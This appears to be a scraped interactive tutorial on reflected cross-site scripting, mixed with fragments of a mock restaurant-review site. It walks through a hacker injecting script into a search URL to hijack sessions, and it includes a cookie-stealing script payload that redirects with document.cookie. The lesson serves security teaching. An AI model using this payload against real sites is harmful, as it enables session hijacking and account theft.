Reflected XSS
Mal is a hacker who has noticed that your site's search function passes search terms in the URL.
He knows the search terms in the URL will get displayed back on the search results page, and he wonders if they are escaped properly.
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
Sure enough, when he drops the URL in his browser, the injected JavaScript is executed and the browser redirects to his malicious site.
Mal can now checks his server log and hijack Vic's session, since the malicious redirect passed his session ID in the URL.
Let's look in my big book of hacks.<script>window.location=""+document.cookie</script>
All your sessions are belong to us.
The indifferent restaurant review site
I guess you should search for food or something.
Server Logs
Webpage HTML
<div class="search-terms">
  Search results for "<script>

<h6>No results found</h6>
The indifferent restaurant review site

Search results for ""

This seems relevant to my interests.
Where's this taco then?
I am not having a good day.